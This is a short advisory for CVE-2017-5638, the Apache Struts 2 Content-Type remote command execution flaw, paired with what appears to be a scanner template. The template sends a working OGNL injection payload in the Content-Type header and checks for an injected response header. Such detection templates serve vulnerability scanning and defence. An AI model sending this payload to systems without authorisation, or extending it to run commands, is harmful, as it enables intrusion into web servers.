Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
PoC代码[已公开]
id: CVE-2017-5638
info:
name: Apache Struts 2 - Remote Command Execution S2-045 S2-046
author: Random_Robbie
severity: critical
description: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
reference:
- https://github.com/mazen160/struts-pwn
- https://nvd.nist.gov/vuln/detail/CVE-2017-5638
- https://isc.sans.edu/diary/22169
- https://github.com/rapid7/metasploit-framework/issues/8064
rules:
r0:
request:
method: GET
path: /
headers:
Content-Type: "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz Test')}.multipart/form-data"
expression: 'response.raw_header.bcontains(b"X-Hacker: Bounty Plz Test")'
expression: r0()